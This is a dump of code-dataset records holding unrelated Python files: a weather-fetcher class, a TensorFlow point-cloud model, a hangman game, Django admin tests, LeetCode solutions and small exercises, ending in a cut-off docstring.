packages=[\n 'bana',\n 'bana.OpenMaya',\n 'bana.OpenMayaAnim',\n 'bana.OpenMayaFX',\n 'bana.OpenMayaRender',\n 'bana.OpenMayaUI',\n ],\n include_package_data=True\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"382274731","text":"from os.path import isfile\r\nfrom urllib.request import urlretrieve\r\nfrom urllib.error import HTTPError\r\nfrom GeoPoint import City\r\nfrom datetime import datetime\r\n\r\n# FOR HINTING\r\nfrom Configuration import Configuration\r\n\r\nimport logging\r\nimport json\r\n\r\nclass ConditionsFetcher:\r\n\r\n citysearch_url_format: str\r\n conditions_url_format: str\r\n city: \"City\"\r\n\r\n def __init__(self, configObj: \"Configuration\"):\r\n\r\n logging.debug(\"Creating ConditionsFetcher\")\r\n self.citysearch_url_format = configObj.citysearch_url_format\r\n self.conditions_url_format = configObj.conditions_url_format\r\n \r\n def fetch_city(self, configObj: \"Configuration\"): pass\r\n def get_conditions(self, configObj: \"Configuration\"): pass\r\n\r\nclass MetaweatherFetcher(ConditionsFetcher):\r\n\r\n def fetch_city(self, configObj: \"Configuration\"): \r\n\r\n logging.debug(\"MetaweatherFetcher(ConditionsFetcher).get_city_id\")\r\n\r\n url = self.citysearch_url_format.substitute(lon = configObj.center_lon, lat = configObj.center_lat)\r\n\r\n if not isfile(\"cityidsearch.txt\"):\r\n logging.info(\"Making a web request for closest city into cityidsearch.txt\")\r\n try:\r\n logging.debug(\"Request successful\")\r\n urlretrieve(url, \"cityidsearch.txt\")\r\n logging.info(\"Successfully fetched %s\" % url)\r\n\r\n except HTTPError:\r\n logging.error(\"Not present %s\" % url)\r\n raise RuntimeError(\"\")\r\n\r\n logging.debug(\"Loading cityidsearch.txt into json parser\")\r\n\r\n search_results_json = json.load(open(\"cityidsearch.txt\", \"r\"))\r\n closest_city = search_results_json[0]\r\n\r\n latt_long = closest_city.get(\"latt_long\").split(\",\")\r\n\r\n self.city = City(Lat = float(latt_long[0]), Lon = float(latt_long[1]))\r\n\r\n self.city.api_id = closest_city.get(\"woeid\")\r\n self.city.name = closest_city.get(\"title\")\r\n\r\n distance = closest_city.get(\"distance\") / 1000\r\n\r\n if distance > 40.0:\r\n raise RuntimeWarning(\"Closest available wind data is sourced from more than 40 kilometers\")\r\n\r\n logging.info(\"%s (woeid %i) is %0.2f km away\" % (self.city.name, self.city.api_id, distance))\r\n\r\n def get_conditions(self):\r\n\r\n if not self.city.name:\r\n raise RuntimeError(\"Attempted to get conditions without a city loaded\")\r\n \r\n url = self.conditions_url_format.substitute(woeid = self.city.api_id)\r\n\r\n if not isfile(\"cityconditions.txt\"):\r\n logging.info(\"Making a web request for local conditions into cityconditions.txt\")\r\n try:\r\n logging.debug(\"Request successful\")\r\n urlretrieve(url, \"cityconditions.txt\")\r\n logging.info(\"Successfully fetched %s\" % url)\r\n\r\n except HTTPError:\r\n logging.error(\"Not present %s\" % url)\r\n raise RuntimeError(\"\")\r\n \r\n logging.debug(\"Loading cityconditions.txt into json parser\")\r\n\r\n conditions_json = json.load(open(\"cityconditions.txt\", \"r\"))\r\n weather_report = conditions_json.get(\"consolidated_weather\")\r\n\r\n current_day_weather_report: dict\r\n \r\n for day in weather_report:\r\n if day.get(\"applicable_date\") == datetime.now().strftime(\"%Y-%m-%d\"):\r\n current_day_weather_report = day\r\n \r\n wind_speed_mps = current_day_weather_report.get(\"wind_speed\") * 0.44704\r\n wind_flows_frm = current_day_weather_report.get(\"wind_direction\")\r\n\r\n return (wind_speed_mps, wind_flows_frm)","sub_path":"ConditionsFetcher.py","file_name":"ConditionsFetcher.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"149790890","text":"\ndef staircase(n):\n def helper(cur_n):\n nonlocal n\n if cur_n == 0:\n return\n print('_'*(cur_n-1)+'#'*(n-cur_n+1))\n helper(cur_n-1)\n def helper_2(cur_n):\n nonlocal n\n if cur_n == n:\n return\n print('_'*cur_n + '#'*(n-cur_n))\n helper_2(cur_n+1)\n \n if n == 0:\n return \"Not Draw!\"\n elif n > 0:\n helper(n)\n else:\n n = -1*n\n helper_2(0)\n return ''\n\nprint(staircase(int(input(\"Enter Input : \"))))","sub_path":"lab06_recursive/ch6_5.py","file_name":"ch6_5.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"15898510","text":"import tensorflow as tf\nimport numpy as np\nimport math\nimport sys\nimport os\nimport numpy as np\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(BASE_DIR)\nsys.path.append(os.path.join(BASE_DIR, '../utils'))\nimport helper\nimport tf_util\nimport tf_util_loss\n\nclass Network:\n\tdef placeholder_inputs(self,batch_size, num_point):\n\t\tsource_pointclouds_pl = tf.placeholder(tf.float32, shape=(batch_size, num_point, 3))\n\t\ttemplate_pointclouds_pl = tf.placeholder(tf.float32, shape=(batch_size, num_point, 3))\n\t\treturn source_pointclouds_pl,template_pointclouds_pl\n\n\n\tdef get_model(self, source_point_cloud, template_point_cloud, feature_size, is_training, bn_decay=None):\n\t\tpoint_cloud = tf.concat([source_point_cloud, template_point_cloud], 0)\n\t\tbatch_size = point_cloud.get_shape()[0].value\n\t\tnum_point = point_cloud.get_shape()[1].value\n\t\tend_points = {}\n\n\t\tinput_image = tf.expand_dims(point_cloud, -1)\n\n\t\tnet = tf_util.conv2d(input_image, 64, [1,3],\n\t\t\t\t\t\t\t padding='VALID', stride=[1,1],\n\t\t\t\t\t\t\t bn=False, is_training=is_training,\n\t\t\t\t\t\t\t scope='conv1', bn_decay=bn_decay)\n\t\tnet = tf_util.conv2d(net, 64, [1,1],\n\t\t\t\t\t\t\t padding='VALID', stride=[1,1],\n\t\t\t\t\t\t\t bn=False, is_training=is_training,\n\t\t\t\t\t\t\t scope='conv2', bn_decay=bn_decay)\n\n\t\tnet = tf_util.conv2d(net, 64, [1,1],\n\t\t\t\t\t\t\t padding='VALID', stride=[1,1],\n\t\t\t\t\t\t\t bn=False, is_training=is_training,\n\t\t\t\t\t\t\t scope='conv3', bn_decay=bn_decay)\n\t\tnet = tf_util.conv2d(net, 128, [1,1],\n\t\t\t\t\t\t\t padding='VALID', stride=[1,1],\n\t\t\t\t\t\t\t bn=False, is_training=is_training,\n\t\t\t\t\t\t\t scope='conv4', bn_decay=bn_decay)\n\t\tnet = tf_util.conv2d(net, feature_size, [1,1],\n\t\t\t\t\t\t\t padding='VALID', stride=[1,1],\n\t\t\t\t\t\t\t bn=False, is_training=is_training,\n\t\t\t\t\t\t\t scope='conv5', bn_decay=bn_decay)\n\n\t\t# Symmetric function: max pooling\n\t\tnet = tf_util.max_pool2d(net, [num_point,1],\n\t\t\t\t\t\t\t\t padding='VALID', scope='maxpool')\n\t\tnet = tf.reshape(net, [batch_size, -1])\n\t\t \n\t\t# Extract the features from the network.\n\t\tsource_global_feature = tf.slice(net, [0,0], [int(batch_size/2),feature_size])\n\t\ttemplate_global_feature = tf.slice(net, [int(batch_size/2),0], [int(batch_size/2),feature_size])\n\t\treturn source_global_feature, template_global_feature\n\n\tdef get_pose(self,source_global_feature,template_global_feature,is_training,bn_decay=None):\n\t\t# with tf.variable_scope('pose_estimation') as pn:\n\t\tnet = tf.concat([source_global_feature,template_global_feature],1)\n\t\tnet = tf_util.fully_connected(net, 1024, bn=False, is_training=is_training,scope='fc1', bn_decay=bn_decay)\n\t\tnet = tf_util.fully_connected(net, 1024, bn=False, is_training=is_training,scope='fc2', bn_decay=bn_decay)\n\t\tnet = tf_util.fully_connected(net, 512, bn=False, is_training=is_training,scope='fc3', bn_decay=bn_decay)\n\t\tnet = tf_util.fully_connected(net, 512, bn=False, is_training=is_training,scope='fc4', bn_decay=bn_decay)\n\t\tnet = tf_util.fully_connected(net, 256, bn=False, is_training=is_training,scope='fc5', bn_decay=bn_decay)\n\t\tpredicted_transformation = tf_util.fully_connected(net, 7, activation_fn=None, scope='fc6')\n\t\treturn predicted_transformation\n\n\tdef get_loss_b(self,predicted_transformation,batch_size,template_pointclouds_pl,source_pointclouds_pl):\t\n\t\twith tf.variable_scope('loss') as LossEvaluation:\n\t\t\tpredicted_position = tf.slice(predicted_transformation,[0,0],[batch_size,3])\n\t\t\tpredicted_quat = tf.slice(predicted_transformation,[0,3],[batch_size,4])\n\n\t\t\t# with tf.variable_scope('quat_normalization') as norm:\n\t\t\tnorm_predicted_quat = tf.reduce_sum(tf.square(predicted_quat),1)\n\t\t\tnorm_predicted_quat = tf.sqrt(norm_predicted_quat)\n\t\t\tnorm_predicted_quat = tf.reshape(norm_predicted_quat,(batch_size,1))\n\t\t\tconst = tf.constant(0.0000001,shape=(batch_size,1),dtype=tf.float32)\n\t\t\tnorm_predicted_quat = tf.add(norm_predicted_quat,const)\n\t\t\tpredicted_norm_quat = tf.divide(predicted_quat,norm_predicted_quat)\n\t\n\t\t\ttransformed_predicted_point_cloud = helper.transformation_quat_tensor(source_pointclouds_pl, predicted_norm_quat, predicted_position)\n\n\t\t\t# Use 1024 Points to find loss.\n\t\t\t#loss = tf_util_loss.earth_mover(template_pointclouds_pl, transformed_predicted_point_cloud)\n\t\t\tloss = tf_util_loss.chamfer(template_pointclouds_pl, transformed_predicted_point_cloud)\n\t\t\t# loss = 0\n\t\treturn loss\n\nif __name__=='__main__':\n\twith tf.Graph().as_default():\n\t\tinputs = tf.zeros((32,1024,3))\n\t\toutputs = get_model(inputs, tf.constant(True))\n\t\tprint(outputs)\n","sub_path":"pcrnet/models/pcr_model.py","file_name":"pcr_model.py","file_ext":"py","file_size_in_byte":4410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"396381798","text":"\"\"\"\r\nproblem 30: Substring with Concatenation of All Words\r\nhttps://leetcode.com/problems/substring-with-concatenation-of-all-words/\r\n\r\nsolution:\r\n HASH TABLE\r\n\r\n\"\"\" \r\n\r\nclass Solution(object):\r\n def findSubstring(self, s, words):\r\n \"\"\"\r\n :type s: str\r\n :type words: List[str]\r\n :rtype: List[int]\r\n \"\"\"\r\n result = []\r\n if not words:\r\n return result\r\n table = dict()\r\n for word in words:\r\n if word not in table:\r\n table[word] = 0\r\n table[word] += 1\r\n len_word = len(words[0])\r\n len_words = len(words)\r\n len_string = len(s)\r\n len_all_words = len_word * len_words\r\n for start_index in range(len_string + 1 - len_all_words):\r\n cur_table = dict()\r\n for index in range(start_index, start_index + len_all_words, len_word):\r\n cur_word = s[index:index+len_word]\r\n if cur_word in table:\r\n if cur_word not in cur_table:\r\n cur_table[cur_word] = 0\r\n if cur_table[cur_word] >= table[cur_word]:\r\n break\r\n else:\r\n cur_table[cur_word] += 1\r\n else:\r\n break\r\n else:\r\n result.append(start_index)\r\n return result","sub_path":"P0030.py","file_name":"P0030.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"489130292","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# ---------------------------------------------------------------------\nimport random\nimport QDS\n\n# ---------------------------------------------------------------------\ndef presentGrid():\n # Present grid\n #\n QDS.AwaitTTL() \n\n rot\t= 0.0\n for iT in range(p['nFr']):\n BoxColList = []\n BoxAlpList = []\n BoxRotList = []\n for iB in range(1, nB+1):\n r = random.randint(5, 250)\n g = random.randint(5, 250)\n b = random.randint(5, 250)\n BoxColList.append((r, g, b))\n BoxAlpList.append(127)\n BoxRotList.append(rot)\n rot += p['dRot_step']\n QDS.SetObjColorEx(BoxIndList, BoxColList, BoxAlpList)\n QDS.Scene_RenderEx(p['dtFr_s'], BoxIndList, BoxPosList, BoxMagList,\n BoxRotList, int((iT % p['nPrMark']) == 0))\n\n# ---------------------------------------------------------------------\nQDS.Initialize(\"noise_Colored_wait\", \"Example for await trigger\")\n\n# Set random generator seed\n#\nrandom.seed(1)\n\n# Define global stimulus parameters\n#\np = {}\np['dtFr_s'] = 3/60.0 # presentation time per pattern\np['nFr'] = 50 # # of frames per trial\np['nTrials'] = 5 # # of trials\np['nPrMark'] = 20 # present marker every p['nPrMark']*p['dtFr_s']\np['nRows'] = 20 # dimensions of pattern grid\np['nCols'] = 20\np['boxDx'] = 25 # box size in um\np['boxDy'] = 25\np['dRot_step'] = 0 # angle by which boxes are rotated\n\n# Define objects\n# Generate one box object per grid position\n#\nnB = p['nRows']*p['nCols']\nfor iB in range(1, nB+1):\n QDS.DefObj_Box(iB, p['boxDx'], p['boxDy'])\n\n# Fill list with parameters for every box object\n#\nBoxIndList = []\nBoxPosList = []\nBoxMagList = []\nBoxRotList = []\n\nfor iX in range(p['nCols']):\n for iY in range(p['nRows']):\n iB = 1 +iX +iY*p['nCols']\n x = iX*p['boxDx'] +p['boxDx']/2.0 -p['boxDx']*p['nCols']/2.0\n y = iY*p['boxDy'] +p['boxDy']/2.0 -p['boxDy']*p['nRows']/2.0\n BoxIndList.append(iB)\n BoxPosList.append((x,y))\n BoxMagList.append((2.0, 1.0))\n BoxRotList.append(0)\n\n# Start of stimulus run\n#\nQDS.StartScript()\nQDS.Scene_Clear(1.0, 0)\n\nQDS.Loop(p[\"nTrials\"], presentGrid)\n\nQDS.Scene_Clear(1.0, 0)\n\n# Finalize stimulus\n#\nQDS.EndScript()\n\n# ---------------------------------------------------------------------\n","sub_path":"Stimuli/noise_Colored_Wait.py","file_name":"noise_Colored_Wait.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"622217809","text":"# -*- coding: utf-8 -*-\nimport xgboost as xgb\nfrom xgboost.sklearn import XGBRegressor\nfrom sklearn import metrics\nfrom sklearn.model_selection import GridSearchCV\nimport xgbtrain\nfrom xgboost import plot_importance\nfrom matplotlib import pyplot as plt\nimport warnings\nimport numpy as np\nwarnings.filterwarnings(\"ignore\")\n \n#alg传入XGBOOST,X_train传入训练数据特征信息,Y_train传入训练数据标签信息 X_testdata最后要预测的值\ndef XGBmodelfit(alg, X_train, Y_train,X_test=None,Y_test=None,X_predictions=None,useTrainCV=True, cv_folds=5, early_stopping_rounds=200):\n if useTrainCV:\n xgb_param = alg.get_xgb_params()\n xgtrain = xgb.DMatrix(X_train, label=Y_train)\n cvresult = xgb.cv(xgb_param, xgtrain, num_boost_round=alg.get_params()['n_estimators'], nfold=cv_folds,\n metrics='error', early_stopping_rounds=early_stopping_rounds, show_stdv=False)\n alg.set_params(n_estimators=cvresult.shape[0])\n \n #训练模型\n alg.fit(X_train, Y_train,eval_metric='error')\n \n #预测结果:\n dtrain_predictions = alg.predict(X_test) #输出 0 或 1\n # dtrain_predprob = alg.predict_proba(X_test)[:,1] #输出概率\n \n #打印报告信息:\n print(\"\\nModel Report\")\n print(\"Accuracy (Train) : %.4g\" % metrics.accuracy_score(Y_test, dtrain_predictions))\n print(\"AUC Score (Train): %f\" % metrics.roc_auc_score(Y_test, dtrain_predictions))\n print(alg)\n print(\"the best:\")\n print(cvresult.shape[0])\n plot_importance(alg)\n plt.show()\n \n # feat_imp = pd.Series(alg.booster().get_fscore()).sort_values(ascending=False)\n # feat_imp.plot(kind='bar', title='Feature Importances')\n # plt.ylabel('Feature Importance Score')\n \n\n \nx_train,y_train,x_valid,y_valid,x_test,y_test = xgbtrain.built_dataset()\n \nxgb1 = XGBClassifier(\n learning_rate =0.1,\n n_estimators=1000,\n max_depth=5,\n min_child_weight=1,\n gamma=0,\n subsample=0.8,\n colsample_bytree=0.8,\n objective= 'binary:logistic',\n nthread=4,\n scale_pos_weight=1,\n seed=27)\n \n# XGBmodelfit(xgb1,X_train,y_train,X_test,y_test)\n \nparam_grid = {\n 'max_depth':range(3,10,1),\n 'min_child_weight':range(1,9,1),\n 'subsample': np.arange(0.1,1.0,0.1),\n 'colsample_bytree':np.arange(0.1,1.0,0.1)\n}\n# param_grid = {\n# 'max_depth':[7,8],\n# 'min_child_weight':[4,5]\n# }\n\n\n#gsearch1 = GridSearchCV(estimator = XGBClassifier(\n# learning_rate =0.1, n_estimators=140, max_depth=9,\n# min_child_weight=1, gamma=0, subsample=0.8,colsample_bytree=0.8,\n# objective= 'binary:logistic', nthread=4,scale_pos_weight=1, seed=27),\n# param_grid=param_grid,cv=10)\n\n\ngsearch1 = GridSearchCV(estimator = XGBRegressor(\n learning_rate =0.2, \n objective= 'binary:logistic', \n booster= 'gbtree',\n eta=0.2,\n max_depth=4, # 4 3\n colsample_bytree=0.7, #0.8\n subsample= 0.7,\n min_child_weight=1, # 2 3\n silent= 0,\n eval_metric='error',),\n param_grid=param_grid,cv=10)\ngsearch1.fit(np.array(x_train),np.array(y_train))\nprint(gsearch1.best_params_,gsearch1.best_score_)\n\n","sub_path":"xgboost(弃用)/gridsearch.py","file_name":"gridsearch.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"496591920","text":"import random\r\nimport time\r\nfrom colored import fg, attr\r\nfrom turtle import Turtle, Screen\r\n\r\nturtle = Turtle()\r\nturns = 10\r\nchar = None\r\ntest = \"\"\r\n\r\n\r\ndef InitTurtle():\r\n screen = Screen()\r\n screen.setup(width=0.333, height=0.333, startx=1200, starty=100)\r\n screen.bgcolor(\"black\")\r\n screen.title(\"Hangman\")\r\n turtle.speed(5)\r\n turtle.color(\"red\")\r\n\r\n\r\ndef Turtle():\r\n if not correct:\r\n if turns == 9:\r\n turtle.circle(50, -180)\r\n elif turns == 8:\r\n turtle.circle(50, 90)\r\n turtle.right(90)\r\n turtle.forward(200)\r\n elif turns == 7:\r\n turtle.right(90)\r\n turtle.forward(100)\r\n elif turns == 6:\r\n turtle.right(90)\r\n turtle.forward(50)\r\n elif turns == 5:\r\n turtle.right(90)\r\n turtle.circle(30)\r\n turtle.circle(30, 180)\r\n elif turns == 4:\r\n turtle.right(90)\r\n turtle.forward(20)\r\n elif turns == 3:\r\n turtle.left(30)\r\n turtle.forward(20)\r\n elif turns == 2:\r\n turtle.back(20)\r\n turtle.right(60)\r\n turtle.forward(20)\r\n elif turns == 1:\r\n turtle.back(20)\r\n turtle.left(30)\r\n turtle.back(10)\r\n turtle.right(90)\r\n turtle.forward(10)\r\n elif turns == 0:\r\n turtle.right(180)\r\n turtle.forward(20)\r\n turtle.hideturtle()\r\n\r\n\r\nInitTurtle()\r\n\r\nprint(\" \")\r\nprint('Herzlich Willkommen zu meinem \"Guess the Word\" Game!')\r\n\r\nwhile next:\r\n\r\n turtle.pensize(2)\r\n turtle.penup()\r\n turtle.goto(-100, -100)\r\n turtle.showturtle()\r\n turtle.pendown()\r\n turtle.setheading(-90)\r\n\r\n white = fg('#bfbfbf') + attr('reset')\r\n green = fg('#008000') + attr('bold')\r\n yellow = fg('#808000') + attr('bold')\r\n red = fg('#ff0000') + attr('bold')\r\n\r\n dark_green = fg('#00ff00') + attr('bold')\r\n dark_red = fg('#800000') + attr('bold')\r\n\r\n easy = green + '\"Easy\"'\r\n medium = yellow + '\"Medium\"'\r\n hard = red + '\"Hard\"'\r\n\r\n comma = white + \", \"\r\n\r\n print(\" \")\r\n difficulty = input('Gebe den Schwierigkeitsgrad an (' + easy + comma + medium + comma + hard + white + '): ')\r\n while next:\r\n difficulty = difficulty.lower()\r\n if difficulty == \"easy\":\r\n difficulty = easy\r\n char = random.randint(4, 6)\r\n break\r\n elif difficulty == \"medium\":\r\n difficulty = medium\r\n char = random.randint(7, 10)\r\n break\r\n elif difficulty == \"hard\":\r\n difficulty = hard\r\n char = random.randint(11, 15)\r\n break\r\n else:\r\n print(\" \")\r\n difficulty = input('Gebe einen gültigen Schwierigkeitsgrad an (' + easy + white + comma + medium\r\n + comma + hard + white + '): ')\r\n\r\n print(\" \")\r\n print(\"Gewählter Schwierigkeitsgrad: \" + difficulty + white)\r\n\r\n print(\" \")\r\n time.sleep(0.5)\r\n print(\"Ein zufälliges Wort wird ausgesucht...\")\r\n time.sleep(1)\r\n\r\n wordslist = []\r\n with open(\"words.txt\", \"r\", encoding=\"latin1\") as f:\r\n for line in f:\r\n if len(line) == char:\r\n wordslist.extend(line.split())\r\n\r\n wordslength = len(wordslist)\r\n wordslength -= 1\r\n solution = random.randint(0, wordslength)\r\n solution = wordslist[solution]\r\n solution = solution.lower()\r\n solutionlength = len(solution)\r\n\r\n guesses = \"\"\r\n\r\n print(\"Lösungswort: \" + (\"_\" * solutionlength) + \" (\" + str(solutionlength) + \" Buchstaben)\")\r\n\r\n invalid = True\r\n\r\n guess = input(\"Gebe einen Buchstaben ein: \")\r\n\r\n while invalid:\r\n if guess.isalpha():\r\n guess = guess.lower()\r\n invalid = False\r\n\r\n if turns == 0:\r\n print(\"Lösungswort: \" + solution.capitalize())\r\n print(\" \")\r\n time.sleep(0.25)\r\n print(dark_red + \"Du verlierst!\" + white)\r\n\r\n else:\r\n while turns > 0:\r\n guesses += guess\r\n\r\n if guess in solution:\r\n turns -= 1\r\n print(dark_red + \"Richtig\" + white)\r\n time.sleep(0.25)\r\n print(\" \")\r\n correct = True\r\n\r\n while turns > 0:\r\n failed = 0\r\n print(\"Lösungswort: \", end=\"\")\r\n for char in solution:\r\n if char in guesses:\r\n print(char, end=\"\")\r\n test = test + char\r\n else:\r\n print(\"_\", end=\"\")\r\n test = test + char\r\n failed += 1\r\n if failed == 0:\r\n turns -= 1\r\n print(\"\", end=\"\\n\")\r\n print(\" \")\r\n time.sleep(0.25)\r\n print(dark_green + \"Du gewinnst!\" + white)\r\n turns = 0\r\n break\r\n\r\n else:\r\n print(dark_green + \"Falsch\" + white)\r\n time.sleep(0.25)\r\n print(\" \")\r\n correct = False\r\n break\r\n\r\n Turtle()\r\n\r\n if turns == 0:\r\n print(\" \")\r\n time.sleep(1)\r\n nextround = input('Möchtest du nochmals eine Runde spielen? Schreibe ' + dark_green + '\"J\" für Ja'\r\n + white + ' oder ' + dark_red + '\"N\" für Nein' + white + '! ')\r\n nextround = nextround.lower()\r\n if nextround == \"j\" or nextround == \"ja\":\r\n print(\" \")\r\n turtle.clear()\r\n break\r\n else:\r\n print(\"Vielen Dank fürs spielen!\")\r\n quit()\r\n\r\n else:\r\n print(\" (\" + str(solutionlength) + \" Buchstaben)\")\r\n print(\"Du hast noch \" + str(turns) + \" Versuche!\")\r\n\r\n invalid = True\r\n\r\n while invalid:\r\n guess = input(\"Gebe einen gültigen Buchstaben ein: \")\r\n if not guess.isalpha():\r\n print(\" \")\r\n print(dark_red + \"Dies ist kein gültiger Buchstabe!\" + white)\r\n print(\" \")\r\n guess = input(\"Gebe einen richtigen Buchstaben ein: \")\r\n print(\" \")\r\n else:\r\n guess = guess.lower()\r\n invalid = False\r\n break\r\n\r\n else:\r\n print(\" \")\r\n print(dark_red + \"Dies ist kein gültiger Buchstabe!\" + white)\r\n print(\" \")\r\n guess = input(\"Gebe einen gültigen Buchstaben ein: \")\r\n","sub_path":"Guess_the_Word_v5.0.py","file_name":"Guess_the_Word_v5.0.py","file_ext":"py","file_size_in_byte":7201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"243058834","text":"\"\"\"\n题目:输入一个字符串,打印出该字符串中字符的所有排列。\n例如,输入字符串 abc,则打印出由字符 a, b, c 所能排列出的所有字符串\nabc、acb、bac、bca、cab 和 cba。\n\"\"\"\n\n\ndef permutation(string):\n if not string:\n return\n\n char_list = list(string)\n permutation_core(char_list, 0)\n\n\ndef permutation_core(char_list, index):\n length = len(char_list)\n\n if index == length:\n string = ''.join(char_list)\n print(string)\n else:\n for i in range(index, length):\n temp = char_list[i]\n char_list[i] = char_list[index]\n char_list[index] = temp\n\n permutation_core(char_list, index + 1)\n\n temp = char_list[i]\n char_list[i] = char_list[index]\n char_list[index] = temp\n\n\ndef test():\n test_case1 = \"a\"\n test_case2 = \"abc\"\n test_case3 = \"\"\n test_case4 = None\n\n print(\"字符串 {} 中的字符排列: \".format(test_case1))\n permutation(test_case1)\n print(\"字符串 {} 中的字符排列: \".format(test_case2))\n permutation(test_case2)\n print(\"字符串 {} 中的字符排列: \".format(test_case3))\n permutation(test_case3)\n print(\"字符串 {} 中的字符排列: \".format(test_case4))\n permutation(test_case4)\n\n\nif __name__ == '__main__':\n test()\n","sub_path":"38-字符串的排列/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"545676240","text":"import json\n\nfrom django.contrib.admin.sites import AdminSite\nfrom django.utils.html import format_html\n\nfrom olympia import amo\nfrom olympia.amo.tests import (TestCase, addon_factory, user_factory,\n version_factory)\nfrom olympia.amo.urlresolvers import reverse\nfrom olympia.scanners.admin import ScannersResultAdmin\nfrom olympia.scanners.models import ScannersResult\n\n\nclass TestScannersResultAdmin(TestCase):\n def setUp(self):\n super().setUp()\n\n self.user = user_factory()\n self.grant_permission(self.user, 'Admin:Advanced')\n self.client.login(email=self.user.email)\n self.list_url = reverse('admin:scanners_scannersresult_changelist')\n\n self.admin = ScannersResultAdmin(model=ScannersResult,\n admin_site=AdminSite())\n\n def test_list_view(self):\n response = self.client.get(self.list_url)\n assert response.status_code == 200\n\n def test_list_view_is_restricted(self):\n user = user_factory()\n self.grant_permission(user, 'Admin:Curation')\n self.client.login(email=user.email)\n response = self.client.get(self.list_url)\n assert response.status_code == 403\n\n def test_has_add_permission(self):\n assert self.admin.has_add_permission(request=None) is False\n\n def test_has_delete_permission(self):\n assert self.admin.has_delete_permission(request=None) is False\n\n def test_has_change_permission(self):\n assert self.admin.has_change_permission(request=None) is False\n\n def test_formatted_addon(self):\n addon = addon_factory()\n version = version_factory(\n addon=addon,\n channel=amo.RELEASE_CHANNEL_LISTED\n )\n result = ScannersResult(version=version)\n\n assert self.admin.formatted_addon(result) == (\n '{} (version: {})'.format(\n reverse('reviewers.review', args=[addon.slug]),\n addon.name,\n version.id\n )\n )\n\n def test_formatted_addon_without_version(self):\n result = ScannersResult(version=None)\n\n assert self.admin.formatted_addon(result) == '-'\n\n def test_listed_channel(self):\n version = version_factory(\n addon=addon_factory(),\n channel=amo.RELEASE_CHANNEL_LISTED\n )\n result = ScannersResult(version=version)\n\n assert self.admin.channel(result) == 'listed'\n\n def test_unlisted_channel(self):\n version = version_factory(\n addon=addon_factory(),\n channel=amo.RELEASE_CHANNEL_UNLISTED\n )\n result = ScannersResult(version=version)\n\n assert self.admin.channel(result) == 'unlisted'\n\n def test_channel_without_version(self):\n result = ScannersResult(version=None)\n\n assert self.admin.channel(result) == '-'\n\n def test_formatted_results(self):\n results = {'some': 'results'}\n result = ScannersResult(results=results)\n\n assert self.admin.formatted_results(result) == format_html(\n '
{}
',\n json.dumps(results, indent=2)\n )\n\n def test_formatted_results_without_results(self):\n result = ScannersResult()\n\n assert self.admin.formatted_results(result) == '
{}
'\n","sub_path":"src/olympia/scanners/tests/test_admin.py","file_name":"test_admin.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"520685246","text":"import functools\nimport types\n\nfrom werkzeug.contrib.cache import GAEMemcachedCache\n\nimport malcat\n\n\nMEMCACHE_TIMEOUT = malcat.config.get('MEMCACHE_TIMEOUT')\n\n\nclass Cache(GAEMemcachedCache):\n\n def decorate(self, func):\n @functools.wraps(func)\n def get_item(*args, **kwargs):\n if func.__name__ is 'get_list':\n key_suffix = 'list'\n elif func.__name__ is 'get_status_info':\n key_suffix = 'status_info'\n else:\n key_suffix = func.__name__\n\n key = '-'.join(list(map(lambda arg: str(arg).lower(), args)) + [key_suffix])\n value = self.get(key)\n if value is None:\n value = func(*args, **kwargs)\n # Can't cache generators\n if isinstance(value, types.GeneratorType):\n value = list(value)\n\n try:\n self.set(key, value, MEMCACHE_TIMEOUT)\n except ValueError:\n # value is too large for memcache\n pass\n return value\n return get_item\n\n\nmemcache = Cache(None, MEMCACHE_TIMEOUT)\n","sub_path":"malcat/server/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"406026151","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution(object):\n def sortedArrayToBST(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: TreeNode\n \"\"\"\n if (nums == []):\n return\n elif len(nums) == 1:\n return TreeNode(nums[0])\n \n val = nums[len(nums)/2]\n rightArr = nums[len(nums)/2 + 1:]\n leftArr = nums[:len(nums)/2]\n return TreeNode(val, self.sortedArrayToBST(leftArr), self.sortedArrayToBST(rightArr))\n","sub_path":"SortedArrayToBinaryTree/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"107259167","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nDatabaker script to create dataset: ASHE Table 7\n\nUses all tabs from an ASHE table zip file, 16 files for Earnings, the remaining 6 for Hours\n\nexample zip url: \n\n\nLogic\n------\nASHE is amost perfect structure wise with all visual relationships being shown in columns A and B.\n\nTherefore rather than databaking the wholelot cell by cell, we're loading each tab into a dataframe then using databaker \nto establish those viusal relationships and \"correct\" the dataframe. Once fully described its far more \nefficient to flatten (1000's of cells per operation rather than 1000's of individual 